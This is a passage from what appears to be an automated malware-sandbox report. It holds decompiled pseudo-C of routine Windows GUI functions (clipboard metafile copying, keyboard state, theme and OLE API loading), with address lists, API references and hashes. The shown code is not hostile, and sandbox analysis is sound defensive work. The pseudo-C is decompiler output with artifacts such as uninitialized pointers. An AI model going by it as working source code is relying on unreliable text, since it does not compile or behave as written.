					if(_t65 == 0) {
						goto L27;
					}
					_t21 =  *((intOrPtr*)( *_t65 + 0xe8))();
					if(_t21 == 0) {
						goto L28;
					}
					goto L27;
				}
				_t21 = _t39 - 1;
				if(_t21 == 0) {
					if(( *(__eax + 0x54) & 0x00000020) != 0) {
						goto L28;
					}
				} else {
					if(_t21 == 0x17) {
						_t45 = E00E5CFE0(__eax);
						if(_t45 == GetCapture() &&  *0xe7cce0 != 0) {
							_t47 =  *0xe7cce0; // 0x0
							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
								_t48 =  *0xe7cce0; // 0x0
								E00E57A98(_t48, 0, 0x1f, 0);
							}
						}
					}
				}
			}

0x00e5a9fa
0x00e5a9fc
0x00e5a9fe
0x00e5aa00
0x00e5aa05
0x00e5aa24
0x00e5aa27
0x00e5ab04
0x00e5ab0b
0x00e5ab56
0x00e5ab56
0x00e5ab56
0x00e5ab47
0x00000000
0x00e5ab4b
0x00e5aa35
0x00e5aace
0x00e5aad5
0x00000000
0x00000000
0x00e5aadb
0x00000000
0x00000000
0x00e5aadf
0x00e5aae6
0x00000000
0x00000000
0x00e5aaeb
0x00e5aaef
0x00e5aaf2
0x00e5aaf5
0x00e5aafa
0x00e5aafb
0x00000000
0x00e5aafb
0x00000000
0x00e5aa3b
0x00e5aa07
0x00e5aa7d
0x00e5aa86
0x00000000
0x00000000
0x00e5aa95
0x00e5aaa4
0x00e5aab1
0x00e5aab8
0x00000000
0x00000000
0x00e5aabe
0x00000000
0x00e5aabe
0x00e5aa09
0x00e5aa0c
0x00e5aa47
0x00e5aa4b
0x00000000
0x00000000
0x00e5aa57
0x00e5aa5f
0x00000000
0x00000000
0x00000000
0x00e5aa65
0x00e5aa0e
0x00e5aa0f
0x00e5aa6e
0x00000000
0x00000000
0x00e5aa11
0x00e5aa14
0x00e5ab11
0x00e5ab1f
0x00e5ab2a
0x00e5ab32
0x00e5ab3d
0x00e5ab42
0x00e5ab42
0x00e5ab32
0x00e5ab1f
0x00e5aa14

APIs

GetCapture.USER32 ref: 00E5AB18

Strings

, xrefs: 00E5AA6A

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Capture
String ID:
API String ID: 1145282425-3916222277
Opcode ID: 9dc0a7a71dc8f43f59d9aa216ebe2f8146a077d73c7dc07a84b387ad62245337
Instruction ID: b05172223d2db9f10f21253131d01171ca513af2fd34182e3be120a02e77ae57
Opcode Fuzzy Hash: 9dc0a7a71dc8f43f59d9aa216ebe2f8146a077d73c7dc07a84b387ad62245337
Instruction Fuzzy Hash: 263185313042014BC6A0AA3C8955B5A63D76B4431AF1CBF79BD5AF7296EA34DC4DC782

Uniqueness

Uniqueness Score: -1.00%

Function 00E33B10 Relevance: 4.6, APIs: 3, Instructions: 51
fileclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E33B10(intOrPtr* __eax, void* __ecx, void* __edx) {
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				struct tagENHMETAHEADER _v104;
				void* __ebp;
				intOrPtr _t35;
				intOrPtr* _t37;
				struct HENHMETAFILE__* _t43;
				intOrPtr _t44;

				_t37 = __eax;
				_t43 = GetClipboardData(0xe);
				if(_t43 == 0) {
					_t35 =  *0xe7e148; // 0xe2dff4
					E00E3103C(_t35);
				}
				E00E332B0(_t37);
				_t44 =  *((intOrPtr*)(_t37 + 0x28));
				 *(_t44 + 8) = CopyEnhMetaFileA(_t43, 0);
				GetEnhMetaFileHeader( *(_t44 + 8), 0x64,  &_v104);
				 *((intOrPtr*)(_t44 + 0xc)) = _v72 - _v104.rclFrame;
				 *((intOrPtr*)(_t44 + 0x10)) = _v68 - _v76;
				 *((short*)(_t44 + 0x18)) = 0;
				 *((char*)(_t37 + 0x2c)) = 1;
				 *((char*)(_t37 + 0x22)) =  *((intOrPtr*)( *_t37 + 0x24))() & 0xffffff00 | _t31 != 0x00000000;
				return  *((intOrPtr*)( *_t37 + 0x10))();
			}

0x00e33b19
0x00e33b22
0x00e33b26
0x00e33b28
0x00e33b2d
0x00e33b2d
0x00e33b34
0x00e33b39
0x00e33b44
0x00e33b51
0x00e33b5c
0x00e33b65
0x00e33b68
0x00e33b6e
0x00e33b7e
0x00e33b90

APIs

GetClipboardData.USER32 ref: 00E33B1D
CopyEnhMetaFileA.GDI32(00000000,00000000,0000000E), ref: 00E33B3F
GetEnhMetaFileHeader.GDI32(?,00000064,?,00000000,00000000,0000000E), ref: 00E33B51

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: FileMeta$ClipboardCopyDataHeader
String ID:
API String ID: 1752724394-0
Opcode ID: 341bfb40fcb6fff8b0b08c63383112a2eb6bb4ed4a9348bec17222e7c5d9d991
Instruction ID: 0030efc32d9f92b8006106454323261adb278e11d0375b6c7ca75499b98929af
Opcode Fuzzy Hash: 341bfb40fcb6fff8b0b08c63383112a2eb6bb4ed4a9348bec17222e7c5d9d991
Instruction Fuzzy Hash: 611139726003049FC710DFA9C885A9BBBF8AF49310F104669E948EB352DA71EC45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E57B64 Relevance: 1.6, APIs: 1, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E57B64(intOrPtr* __eax, signed int* __edx) {
				signed int _v12;
				short _v14;
				char _v16;
				signed int _v20;
				intOrPtr* _v24;
				char _v280;
				signed int _t39;
				signed int _t40;
				signed int _t46;
				intOrPtr* _t47;
				signed int _t50;
				signed int _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				signed int _t67;
				signed int _t68;
				void* _t73;
				signed int* _t79;
				intOrPtr _t90;
				intOrPtr* _t96;

				_t79 = __edx;
				_t96 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
					L4:
					_t39 =  *_t79;
					if(_t39 < 0x100 || _t39 > 0x108) {
						_t40 =  *_t79;
						__eflags = _t40 - 0x200;
						if(_t40 < 0x200) {
							L30:
							__eflags = _t40 - 0xb00b;
							if(_t40 == 0xb00b) {
								E00E564CC(_t96, _t79[1], _t40, _t79[2]);
							}
							L32:
							return  *((intOrPtr*)( *_t96 - 0x14))();
						}
						__eflags = _t40 - 0x20a;
						if(_t40 > 0x20a) {
							goto L30;
						}
						__eflags =  *(_t96 + 0x50) & 0x00000080;
						if(( *(_t96 + 0x50) & 0x00000080) != 0) {
							L16:
							_t46 =  *_t79 - 0x200;
							__eflags = _t46;
							if(__eflags == 0) {
								L21:
								_t47 =  *0xe7e134; // 0xe7fb1c
								E00E49210( *_t47, _t79, _t96, __eflags);
								goto L32;
							}
							_t50 = _t46 - 1;
							__eflags = _t50;
							if(_t50 == 0) {
								L22:
								__eflags =  *((char*)(_t96 + 0x5d)) - 1;
								if(__eflags != 0) {
									 *(_t96 + 0x54) =  *(_t96 + 0x54) | 0x00000001;
									goto L32;
								}
								return E00E13470(_t96, __eflags);
							}
							_t53 = _t50 - 1;
							__eflags = _t53;
							if(_t53 == 0) {
								 *(_t96 + 0x54) =  *(_t96 + 0x54) & 0x0000fffe;
								goto L32;
							}
							__eflags = _t53 == 1;
							if(_t53 == 1) {
								goto L22;
							}
							_t55 =  *0xe7fb58; // 0xf0142c
							__eflags =  *((char*)(_t55 + 0x20));
							if( *((char*)(_t55 + 0x20)) == 0) {
								goto L32;
							} else {
								_t56 =  *0xe7fb58; // 0xf0142c
								__eflags =  *(_t56 + 0x1c);
								if( *(_t56 + 0x1c) == 0) {
									goto L32;
								}
								_t90 =  *0xe7fb58; // 0xf0142c
								_t25 = _t90 + 0x1c; // 0x0
								__eflags =  *_t79 -  *_t25;
								if( *_t79 !=  *_t25) {
									goto L32;
								}
								GetKeyboardState( &_v280);
								_v20 =  *_t79;
								_v16 = E00E3FB2C( &_v280);
								_v14 = _t79[1];
								_v12 = _t79[2];
								return E00E13470(_t96, __eflags);
							}
							goto L21;
						}
						_t67 = _t40 - 0x203;
						__eflags = _t67;
						if(_t67 == 0) {
							L15:
							 *_t79 =  *_t79 - 2;
							__eflags =  *_t79;
							goto L16;
						}
						_t68 = _t67 - 3;
						__eflags = _t68;
						if(_t68 == 0) {
							goto L15;
						}
						__eflags = _t68 != 3;
						if(_t68 != 3) {
							goto L16;
						}
						goto L15;
					}
					_v24 = E00E3FBE8(_t96);
					if(_v24 == 0) {
						goto L32;
					}
					_t73 =  *((intOrPtr*)( *_v24 + 0xf0))();
					if(_t73 == 0) {
						goto L32;
					}
				} else {
					_v24 = E00E3FBE8(__eax);
					if(_v24 == 0 ||  *((intOrPtr*)(_v24 + 0x250)) == 0) {
						goto L4;
					} else {
						_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x250)))) + 0x24))();
						if(_t73 == 0) {
							goto L4;
						}
					}
				}
				return _t73;
			}

0x00e57b70
0x00e57b72
0x00e57b78
0x00e57bb0
0x00e57bb0
0x00e57bb7
0x00e57bf0
0x00e57bf2
0x00e57bf7
0x00e57ccf
0x00e57ccf
0x00e57cd4
0x00e57ce1
0x00e57ce1
0x00e57ce6
0x00000000
0x00e57cec
0x00e57bfd
0x00e57c02
0x00000000
0x00000000
0x00e57c08
0x00e57c0c
0x00e57c22
0x00e57c24
0x00e57c24
0x00e57c29
0x00e57c36
0x00e57c38
0x00e57c41
0x00000000
0x00e57c41
0x00e57c2b
0x00e57c2b
0x00e57c2c
0x00e57c4b
0x00e57c4b
0x00e57c4f
0x00e57c61
0x00000000
0x00e57c61
0x00000000
0x00e57c57
0x00e57c2e
0x00e57c2e
0x00e57c2f
0x00e57c68
0x00000000
0x00e57c68
0x00e57c31
0x00e57c32
0x00000000
0x00000000
0x00e57c6f
0x00e57c74
0x00e57c78
0x00000000
0x00e57c7a
0x00e57c7a
0x00e57c7f
0x00e57c83
0x00000000
0x00000000
0x00e57c87
0x00e57c8d
0x00e57c8d
0x00e57c90
0x00000000
0x00000000
0x00e57c99
0x00e57ca0
0x00e57cae
0x00e57cb5
0x00e57cbc
0x00000000
0x00e57cc8
0x00000000
0x00e57c78
0x00e57c0e
0x00e57c0e
0x00e57c13
0x00e57c1f
0x00e57c1f
0x00e57c1f
0x00000000
0x00e57c1f
0x00e57c15
0x00e57c15
0x00e57c18
0x00000000
0x00000000
0x00e57c1a
0x00e57c1d
0x00000000
0x00000000
0x00000000
0x00e57c1d
0x00e57bc7
0x00e57bce
0x00000000
0x00000000
0x00e57bdd
0x00e57be5
0x00000000
0x00e57beb
0x00e57b7a
0x00e57b81
0x00e57b88
0x00000000
0x00e57b96
0x00e57ba5
0x00e57baa
0x00000000
0x00000000
0x00e57baa
0x00e57b88
0x00e57cf5

APIs

GetKeyboardState.USER32(?,?,?,?,?,00E5AB50), ref: 00E57C99

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: KeyboardState
String ID:
API String ID: 1724228437-0
Opcode ID: 4f38dc47292e030d5d6a802f168f8a58dc3ae2a6b493f19ea39f336d66eab15f
Instruction ID: bbbc82352e67441f87bbbff750a098ffbe14f1dc915ce70d0f6ef56d9d15f2c3
Opcode Fuzzy Hash: 4f38dc47292e030d5d6a802f168f8a58dc3ae2a6b493f19ea39f336d66eab15f
Instruction Fuzzy Hash: 634190707186058BCB21DF28E588AA9F7E1BB49306F1428A5DC85FB391C770DD98CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00E19C14 Relevance: 1.5, APIs: 1, Instructions: 6
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E19C14() {
				struct _SYSTEMTIME* _t2;

				GetLocalTime(_t2);
				return _t2->wYear;
			}

0x00e19c18
0x00e19c24

APIs

GetLocalTime.KERNEL32 ref: 00E19C18

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 5bd8844059777daa509e02a0b2b63edf7dcd71d3ac5d75e3861a93ab33053cc2
Instruction ID: a28c15d9ebe26e361e3350be3ca557d0cba0e449c4181e9869db88815691c3f1
Opcode Fuzzy Hash: 5bd8844059777daa509e02a0b2b63edf7dcd71d3ac5d75e3861a93ab33053cc2
Instruction Fuzzy Hash: EFA0121880480101814033180C0319C30405851620FC4074078B8203D1E929016082A7

Uniqueness

Uniqueness Score: -1.00%

Function 00E3921C Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 266
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00E3921C(void* __ebx, void* __ecx) {
				char _v5;
				intOrPtr _t2;
				intOrPtr _t6;
				intOrPtr _t108;
				intOrPtr _t111;

				_t2 =  *0xe7fa48; // 0xf00dc8
				E00E39014(_t2);
				_push(_t111);
				_push(0xe395cf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t111;
				 *0xe7fa44 =  *0xe7fa44 + 1;
				if( *0xe7fa40 == 0) {
					 *0xe7fa40 = LoadLibraryA("uxtheme.dll");
					if( *0xe7fa40 > 0) {
						 *0xe7f980 = GetProcAddress( *0xe7fa40, "OpenThemeData");
						 *0xe7f984 = GetProcAddress( *0xe7fa40, "CloseThemeData");
						 *0xe7f988 = GetProcAddress( *0xe7fa40, "DrawThemeBackground");
						 *0xe7f98c = GetProcAddress( *0xe7fa40, "DrawThemeText");
						 *0xe7f990 = GetProcAddress( *0xe7fa40, "GetThemeBackgroundContentRect");
						 *0xe7f994 = GetProcAddress( *0xe7fa40, "GetThemeBackgroundContentRect");
						 *0xe7f998 = GetProcAddress( *0xe7fa40, "GetThemePartSize");
						 *0xe7f99c = GetProcAddress( *0xe7fa40, "GetThemeTextExtent");
						 *0xe7f9a0 = GetProcAddress( *0xe7fa40, "GetThemeTextMetrics");
						 *0xe7f9a4 = GetProcAddress( *0xe7fa40, "GetThemeBackgroundRegion");
						 *0xe7f9a8 = GetProcAddress( *0xe7fa40, "HitTestThemeBackground");
						 *0xe7f9ac = GetProcAddress( *0xe7fa40, "DrawThemeEdge");
						 *0xe7f9b0 = GetProcAddress( *0xe7fa40, "DrawThemeIcon");
						 *0xe7f9b4 = GetProcAddress( *0xe7fa40, "IsThemePartDefined");
						 *0xe7f9b8 = GetProcAddress( *0xe7fa40, "IsThemeBackgroundPartiallyTransparent");
						 *0xe7f9bc = GetProcAddress( *0xe7fa40, "GetThemeColor");
						 *0xe7f9c0 = GetProcAddress( *0xe7fa40, "GetThemeMetric");
						 *0xe7f9c4 = GetProcAddress( *0xe7fa40, "GetThemeString");
						 *0xe7f9c8 = GetProcAddress( *0xe7fa40, "GetThemeBool");
						 *0xe7f9cc = GetProcAddress( *0xe7fa40, "GetThemeInt");
						 *0xe7f9d0 = GetProcAddress( *0xe7fa40, "GetThemeEnumValue");
						 *0xe7f9d4 = GetProcAddress( *0xe7fa40, "GetThemePosition");
						 *0xe7f9d8 = GetProcAddress( *0xe7fa40, "GetThemeFont");
						 *0xe7f9dc = GetProcAddress( *0xe7fa40, "GetThemeRect");
						 *0xe7f9e0 = GetProcAddress( *0xe7fa40, "GetThemeMargins");
						 *0xe7f9e4 = GetProcAddress( *0xe7fa40, "GetThemeIntList");
						 *0xe7f9e8 = GetProcAddress( *0xe7fa40, "GetThemePropertyOrigin");
						 *0xe7f9ec = GetProcAddress( *0xe7fa40, "SetWindowTheme");
						 *0xe7f9f0 = GetProcAddress( *0xe7fa40, "GetThemeFilename");
						 *0xe7f9f4 = GetProcAddress( *0xe7fa40, "GetThemeSysColor");
						 *0xe7f9f8 = GetProcAddress( *0xe7fa40, "GetThemeSysColorBrush");
						 *0xe7f9fc = GetProcAddress( *0xe7fa40, "GetThemeSysBool");
						 *0xe7fa00 = GetProcAddress( *0xe7fa40, "GetThemeSysSize");
						 *0xe7fa04 = GetProcAddress( *0xe7fa40, "GetThemeSysFont");
						 *0xe7fa08 = GetProcAddress( *0xe7fa40, "GetThemeSysString");
						 *0xe7fa0c = GetProcAddress( *0xe7fa40, "GetThemeSysInt");
						 *0xe7fa10 = GetProcAddress( *0xe7fa40, "IsThemeActive");
						 *0xe7fa14 = GetProcAddress( *0xe7fa40, "IsAppThemed");
						 *0xe7fa18 = GetProcAddress( *0xe7fa40, "GetWindowTheme");
						 *0xe7fa1c = GetProcAddress( *0xe7fa40, "EnableThemeDialogTexture");
						 *0xe7fa20 = GetProcAddress( *0xe7fa40, "IsThemeDialogTextureEnabled");
						 *0xe7fa24 = GetProcAddress( *0xe7fa40, "GetThemeAppProperties");
						 *0xe7fa28 = GetProcAddress( *0xe7fa40, "SetThemeAppProperties");
						 *0xe7fa2c = GetProcAddress( *0xe7fa40, "GetCurrentThemeName");
						 *0xe7fa30 = GetProcAddress( *0xe7fa40, "GetThemeDocumentationProperty");
						 *0xe7fa34 = GetProcAddress( *0xe7fa40, "DrawThemeParentBackground");
						 *0xe7fa38 = GetProcAddress( *0xe7fa40, "EnableTheming");
					}
				}
				_v5 =  *0xe7fa40 > 0;
				_pop(_t108);
				 *[fs:eax] = _t108;
				_push(0xe395d6);
				_t6 =  *0xe7fa48; // 0xf00dc8
				return E00E3901C(_t6);
			}

0x00e39226
0x00e3922b
0x00e39232
0x00e39233
0x00e39238
0x00e3923b
0x00e3923e
0x00e39247
0x00e39257
0x00e3925c
0x00e3926f
0x00e39281
0x00e39293
0x00e392a5
0x00e392b7
0x00e392c9
0x00e392db
0x00e392ed
0x00e392ff
0x00e39311
0x00e39323
0x00e39335
0x00e39347
0x00e39359
0x00e3936b
0x00e3937d
0x00e3938f
0x00e393a1
0x00e393b3
0x00e393c5
0x00e393d7
0x00e393e9
0x00e393fb
0x00e3940d
0x00e3941f
0x00e39431
0x00e39443
0x00e39455
0x00e39467
0x00e39479
0x00e3948b
0x00e3949d
0x00e394af
0x00e394c1
0x00e394d3
0x00e394e5
0x00e394f7
0x00e39509
0x00e3951b
0x00e3952d
0x00e3953f
0x00e39551
0x00e39563
0x00e39575
0x00e39587
0x00e39599
0x00e395ab
0x00e395ab
0x00e3925c
0x00e395b3
0x00e395b9
0x00e395bc
0x00e395bf
0x00e395c4
0x00e395ce

APIs

LoadLibraryA.KERNEL32(uxtheme.dll,00000000,00E395CF), ref: 00E39252
GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 00E3926A
GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 00E3927C
GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 00E3928E
GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 00E392A0
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 00E392B2
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 00E392C4
GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 00E392D6
GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 00E392E8
GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 00E392FA
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 00E3930C
GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 00E3931E
GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 00E39330
GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 00E39342
GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 00E39354
GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 00E39366
GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 00E39378
GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 00E3938A
GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 00E3939C
GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 00E393AE
GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 00E393C0
GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 00E393D2
GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 00E393E4
GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 00E393F6
GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 00E39408
GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 00E3941A
GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 00E3942C
GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 00E3943E
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00E39450
GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 00E39462
GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 00E39474
GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 00E39486
GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 00E39498
GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 00E394AA
GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 00E394BC
GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 00E394CE
GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 00E394E0
GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 00E394F2
GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 00E39504
GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 00E39516
GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 00E39528
GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 00E3953A
GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 00E3954C
GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 00E3955E
GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 00E39570
GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 00E39582
GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 00E39594
GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 00E395A6

Strings

GetThemeSysColorBrush, xrefs: 00E3947E
GetThemeFilename, xrefs: 00E3945A
DrawThemeIcon, xrefs: 00E3933A
IsThemeDialogTextureEnabled, xrefs: 00E39532
GetThemeSysSize, xrefs: 00E394A2
CloseThemeData, xrefs: 00E39274
EnableTheming, xrefs: 00E3959E
OpenThemeData, xrefs: 00E39262
GetThemeBackgroundContentRect, xrefs: 00E392AA, 00E392BC
IsThemePartDefined, xrefs: 00E3934C
GetThemeBackgroundRegion, xrefs: 00E39304
GetWindowTheme, xrefs: 00E3950E
DrawThemeEdge, xrefs: 00E39328
GetThemeInt, xrefs: 00E393B8
GetThemeSysString, xrefs: 00E394C6
GetThemeDocumentationProperty, xrefs: 00E3957A
GetThemePropertyOrigin, xrefs: 00E39436
GetThemeEnumValue, xrefs: 00E393CA
HitTestThemeBackground, xrefs: 00E39316
GetThemeTextMetrics, xrefs: 00E392F2
uxtheme.dll, xrefs: 00E3924D
GetThemeMetric, xrefs: 00E39382
EnableThemeDialogTexture, xrefs: 00E39520
GetThemeSysFont, xrefs: 00E394B4
GetThemeAppProperties, xrefs: 00E39544
IsAppThemed, xrefs: 00E394FC
DrawThemeParentBackground, xrefs: 00E3958C
GetThemeIntList, xrefs: 00E39424
SetThemeAppProperties, xrefs: 00E39556
GetThemeSysColor, xrefs: 00E3946C
DrawThemeText, xrefs: 00E39298
IsThemeActive, xrefs: 00E394EA
GetThemeRect, xrefs: 00E39400
GetThemeSysBool, xrefs: 00E39490
GetThemeColor, xrefs: 00E39370
GetThemeBool, xrefs: 00E393A6
GetCurrentThemeName, xrefs: 00E39568
GetThemePartSize, xrefs: 00E392CE
GetThemeFont, xrefs: 00E393EE
GetThemeString, xrefs: 00E39394
GetThemeTextExtent, xrefs: 00E392E0
GetThemeMargins, xrefs: 00E39412
IsThemeBackgroundPartiallyTransparent, xrefs: 00E3935E
DrawThemeBackground, xrefs: 00E39286
GetThemeSysInt, xrefs: 00E394D8
GetThemePosition, xrefs: 00E393DC
SetWindowTheme, xrefs: 00E39448

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
API String ID: 2238633743-2910565190
Opcode ID: 4fb8358f94289b8fc2de3b26a0a762fd9e5e7ad986869dc5cb82ff79193a8037
Instruction ID: 238c7a610951a91076117c9fda7ace4d419aa159c5afe2f8dcc627e62c231836
Opcode Fuzzy Hash: 4fb8358f94289b8fc2de3b26a0a762fd9e5e7ad986869dc5cb82ff79193a8037
Instruction Fuzzy Hash: 1EA1E9B0A11720AFEF00EFB5D98AAA93BE8FB467007412575F414FF256D7B49885CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00E1DE48 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E1DE48() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0xe7f7a8 = E00E1DE1C("VariantChangeTypeEx", E00E1D9B8, _t91);
				 *0xe7f7ac = E00E1DE1C("VarNeg", E00E1D9E8, _t91);
				 *0xe7f7b0 = E00E1DE1C("VarNot", E00E1D9E8, _t91);
				 *0xe7f7b4 = E00E1DE1C("VarAdd", E00E1D9F4, _t91);
				 *0xe7f7b8 = E00E1DE1C("VarSub", E00E1D9F4, _t91);
				 *0xe7f7bc = E00E1DE1C("VarMul", E00E1D9F4, _t91);
				 *0xe7f7c0 = E00E1DE1C("VarDiv", E00E1D9F4, _t91);
				 *0xe7f7c4 = E00E1DE1C("VarIdiv", E00E1D9F4, _t91);
				 *0xe7f7c8 = E00E1DE1C("VarMod", E00E1D9F4, _t91);
				 *0xe7f7cc = E00E1DE1C("VarAnd", E00E1D9F4, _t91);
				 *0xe7f7d0 = E00E1DE1C("VarOr", E00E1D9F4, _t91);
				 *0xe7f7d4 = E00E1DE1C("VarXor", E00E1D9F4, _t91);
				 *0xe7f7d8 = E00E1DE1C("VarCmp", E00E1DA00, _t91);
				 *0xe7f7dc = E00E1DE1C("VarI4FromStr", E00E1DA0C, _t91);
				 *0xe7f7e0 = E00E1DE1C("VarR4FromStr", E00E1DA78, _t91);
				 *0xe7f7e4 = E00E1DE1C("VarR8FromStr", E00E1DAE4, _t91);
				 *0xe7f7e8 = E00E1DE1C("VarDateFromStr", E00E1DB50, _t91);
				 *0xe7f7ec = E00E1DE1C("VarCyFromStr", E00E1DBBC, _t91);
				 *0xe7f7f0 = E00E1DE1C("VarBoolFromStr", E00E1DC28, _t91);
